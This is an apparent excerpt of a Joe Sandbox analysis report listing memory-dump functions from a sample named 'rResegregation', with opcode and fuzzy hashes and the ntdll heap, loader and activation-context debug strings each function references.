                                                                  • Instruction Fuzzy Hash: 8490026160140062454071688D4490640056BF1311751C926A0988550EC56988AD7A65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 92db8cf3eebe591dd450127a6252a57393785773be19c7d38430fa65299a006c
                                                                  • Instruction ID: 3fbdf4c1e12b69a5626414047ade379fccab80ec028529a9d0d131c4d9d1f428
                                                                  • Opcode Fuzzy Hash: 92db8cf3eebe591dd450127a6252a57393785773be19c7d38430fa65299a006c
                                                                  • Instruction Fuzzy Hash: CC90027120180422D50061584D08747000547E0302F51C816A5154555FC675C8D97931
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08d76215059c50d70012500a450233bc09591939b330077b57bf93e12c74a6cb
                                                                  • Instruction ID: 77c94104fe7cb50f94dec3571b6ef406b5a9701cbb2e8e1f8ae2608583393e73
                                                                  • Opcode Fuzzy Hash: 08d76215059c50d70012500a450233bc09591939b330077b57bf93e12c74a6cb
                                                                  • Instruction Fuzzy Hash: 5E90027120180422D50061584D1470B000547E0302F51C816A1154555EC63588997971
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a89d59e5d620e410dae2b97da17daf87653e394d93dee79861a87ea85676dfe
                                                                  • Instruction ID: ff715e755b9d8f1b5b975b834dc0cc097b008d6be2e4a66f146d2ee42d16ea12
                                                                  • Opcode Fuzzy Hash: 4a89d59e5d620e410dae2b97da17daf87653e394d93dee79861a87ea85676dfe
                                                                  • Instruction Fuzzy Hash: E09002A121140062D50461584904706004547F1301F51C817A2144554DC5398CA97525
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff7a39caf5aeb8c0f78ea40c7b14b3d6e406eb764f6363aad07ccf80a04bc5ed
                                                                  • Instruction ID: 3e36556aba07d04d5c66126b4ebf8520c23e95b36f68a014daf7c390e8113fda
                                                                  • Opcode Fuzzy Hash: ff7a39caf5aeb8c0f78ea40c7b14b3d6e406eb764f6363aad07ccf80a04bc5ed
                                                                  • Instruction Fuzzy Hash: 4990026130140422D50261584914606000987E1345F91C817E1414555EC635899BB532
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ecfdac67b52894b6d2f16bee863c907971d3e1d43113e9a610a4926972c1387a
                                                                  • Instruction ID: c4bc65856276f7fd3c668d15cd134de0d1c30bb6cf3e6792f674216bb5e88baf
                                                                  • Opcode Fuzzy Hash: ecfdac67b52894b6d2f16bee863c907971d3e1d43113e9a610a4926972c1387a
                                                                  • Instruction Fuzzy Hash: 1F9002B120140422D54071584904746000547E0301F51C816A5054554FC6698DDD7A65
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cec5c09ce716658f40ab9817b3f5405dbda12767aef23c8297cd9f09f7adb152
                                                                  • Instruction ID: 0654d41a43260055e88af9982261c35e6356b1df45e5076d6ce7174df3d583d4
                                                                  • Opcode Fuzzy Hash: cec5c09ce716658f40ab9817b3f5405dbda12767aef23c8297cd9f09f7adb152
                                                                  • Instruction Fuzzy Hash: 8F90026160140522D50171584904616000A47E0341F91C827A1014555FCA3589DAB531
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13f7cd2d46a8205836665aa0674046b972f675dfd00160a0891b1bd459d4cda2
                                                                  • Instruction ID: 1cfee1871e0a667a3207ba0dc74cd9056ff8f46fe0187e08ff577a44272b2127
                                                                  • Opcode Fuzzy Hash: 13f7cd2d46a8205836665aa0674046b972f675dfd00160a0891b1bd459d4cda2
                                                                  • Instruction Fuzzy Hash: A290026130140023D54071585918606400597F1301F51D816E0404554DD925889E7622
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c0acb1ae5b45373731028ab435e0e8f3ba70d527e4f33a520dc7ed77aa9b64b
                                                                  • Instruction ID: 0037dc7054740766f46bc27e6badd25765b125c50a3c706d27e32e7c3a5fcc91
                                                                  • Opcode Fuzzy Hash: 6c0acb1ae5b45373731028ab435e0e8f3ba70d527e4f33a520dc7ed77aa9b64b
                                                                  • Instruction Fuzzy Hash: 6590027120240162994062585D04A4E410547F1302B91DC1AA0005554DC92488A97621
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  • Opcode Fuzzy Hash: 9600ed1e23b29248c250e2035e5895c9dcaecec783fec25773e3532878412a0b
                                                                  • Instruction Fuzzy Hash: 9790026124545122D550715C4904616400567F0301F51C826A0804594EC565889D7621
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction ID: be3bca9046aa1b18a19a8dd4c4032d3f5ab63f83187abed30f9eaeaee1dadc80
                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction Fuzzy Hash:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP:
                                                                  • API String ID: 3446177414-2466845122
                                                                  • Opcode ID: 14675e284eca230194efc805c4cb122905ae878068175831b73edd2cfc64f4b2
                                                                  • Instruction ID: 1c9a561723c0f06dab8956c21aab42ea181993c07a5bfd15f93471b1fe551135
                                                                  • Opcode Fuzzy Hash: 14675e284eca230194efc805c4cb122905ae878068175831b73edd2cfc64f4b2
                                                                  • Instruction Fuzzy Hash: E8A19D756043119FDB04CE18C8D4A6ABBE5FF98360F08452DE945DB391EB74EC46CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  Strings
                                                                  • ExecuteOptions, xrefs: 378244AB
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37824460
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37824530
                                                                  • Execute=1, xrefs: 3782451E
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 37824507
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 37824592
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3782454D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 040b0b3f378bd5c67e941ac432586b6f194975bb7306665d28247d645c937adf
                                                                  • Instruction ID: 1095e633f181c9528f5f616f6623deb0087714e8c8e4a1d48a8a0b03803ea7c3
                                                                  • Opcode Fuzzy Hash: 040b0b3f378bd5c67e941ac432586b6f194975bb7306665d28247d645c937adf
                                                                  • Instruction Fuzzy Hash: 86510975A012197AEB109E98EC89FE973ADEF18354F4004EDD505AF580EB74AE41CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37817807
                                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 378178F3
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 378177E2
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 378177DD, 37817802
                                                                  • SsHd, xrefs: 377CA304
                                                                  • Actx , xrefs: 37817819, 37817880
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                  • API String ID: 0-1988757188
                                                                  • Opcode ID: e156ebe9f243bd1f4737545cded89af743b575b537b7a78ccb94a9d792893726
                                                                  • Instruction ID: a4c6340a297303661288b7ea41b6aefdd3fc935e05cb09aee53b3e63f5e6e2b5
                                                                  • Opcode Fuzzy Hash: e156ebe9f243bd1f4737545cded89af743b575b537b7a78ccb94a9d792893726
                                                                  • Instruction Fuzzy Hash: 08E1C3746043028FE715CF68C8D4B2A77E2BB89365F524A2DF965CF290DB31E945CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37819178
                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37819372
                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37819153
                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3781914E, 37819173
                                                                  • GsHd, xrefs: 377CD794
                                                                  • Actx , xrefs: 37819315
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                  • API String ID: 3446177414-2196497285
                                                                  • Opcode ID: 446793db2550407c405a2cc53c8f1b753f754c3b426e1353b548dbd95c97e81e
                                                                  • Instruction ID: edc630b46115ecc29652d5ac21a687891a71f59f3452dd5714f27d5614c16b56
                                                                  • Opcode Fuzzy Hash: 446793db2550407c405a2cc53c8f1b753f754c3b426e1353b548dbd95c97e81e
                                                                  • Instruction Fuzzy Hash: 76E1D0746043429FE710CF14C980B5BB7E5BF98368F404A6DE896EF281D771E885CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                  • API String ID: 3446177414-1745908468
                                                                  • Opcode ID: df8407cf2d83a5f1358c4a3840422242bd406f9bfe929f83a3acd155eff11b4b
                                                                  • Instruction ID: e9d2d328e319e2b5a022d48e275208e20a6d1a475d66753e3789c506ddb2f497
                                                                  • Opcode Fuzzy Hash: df8407cf2d83a5f1358c4a3840422242bd406f9bfe929f83a3acd155eff11b4b
                                                                  • Instruction Fuzzy Hash: 4A91EF79901648EFEB42CFA8C444BEDBBF2FF69360F148199E445AB251CB39A941CF11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                  • API String ID: 3446177414-4227709934
                                                                  • Opcode ID: 8bae675bf55cf912d9508f6fde1b25ff658ea1ceb2952bbe5899c64c3e891da3
                                                                  • Instruction ID: f9030d7fada6cf08e0c857fa6040ba7e1ad0565b64bb466d2236d517d17c6e44
                                                                  • Opcode Fuzzy Hash: 8bae675bf55cf912d9508f6fde1b25ff658ea1ceb2952bbe5899c64c3e891da3
                                                                  • Instruction Fuzzy Hash: 88417FB5A01209EFDB01CF99C885AEEBBB5FF58365F100069E905B7340D735AE91EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                  • API String ID: 3446177414-3492000579
                                                                  • Opcode ID: 6e8e2bbd569c41576c4ecf89a5ff959c85a5eaf58a7e221c07598c467abc38cb
                                                                  • Instruction ID: 2e5169f40c2080f5f7dfa290f206381698a9337a5893022bfcf2956961b66591
                                                                  • Opcode Fuzzy Hash: 6e8e2bbd569c41576c4ecf89a5ff959c85a5eaf58a7e221c07598c467abc38cb
                                                                  • Instruction Fuzzy Hash: 63710F74901688EFDB02CFA8D490AADFBF2FF59324F44815AE444AB351CB39A941CF52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37809854, 37809895
                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37809843
                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37809885
                                                                  • LdrpLoadShimEngine, xrefs: 3780984A, 3780988B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-3589223738
                                                                  • Opcode ID: 08d3b9f3de18e668944e8197994cddc8292591e6b17f0265e4e08291d29ab0e6
                                                                  • Instruction ID: 78f2a250da51b3e711e22baf54d546d26aa16e757d5f775c9434acd87cde67be
                                                                  • Opcode Fuzzy Hash: 08d3b9f3de18e668944e8197994cddc8292591e6b17f0265e4e08291d29ab0e6
                                                                  • Instruction Fuzzy Hash: 06513476A013449FEB54DBA8CC59BED7BB2AB55314F040225E410FF395DB78AC42CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                  • API String ID: 3446177414-3224558752
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • HEAP: , xrefs: 3785ECDD
                                                                  • ---------------------------------------, xrefs: 3785EDF9
                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3785EDE3
                                                                  • Entry Heap Size , xrefs: 3785EDED
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                  • API String ID: 3446177414-1102453626
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                  • API String ID: 3446177414-1222099010
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$@
                                                                  • API String ID: 3446177414-1194432280
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • LdrpFindDllActivationContext, xrefs: 37823440, 3782346C
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3782344A, 37823476
                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 37823466
                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37823439
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-3779518884
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 3446177414-3610490719
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 37819F24
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37819F2E
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 37819F1C
                                                                  Memory Dump Source
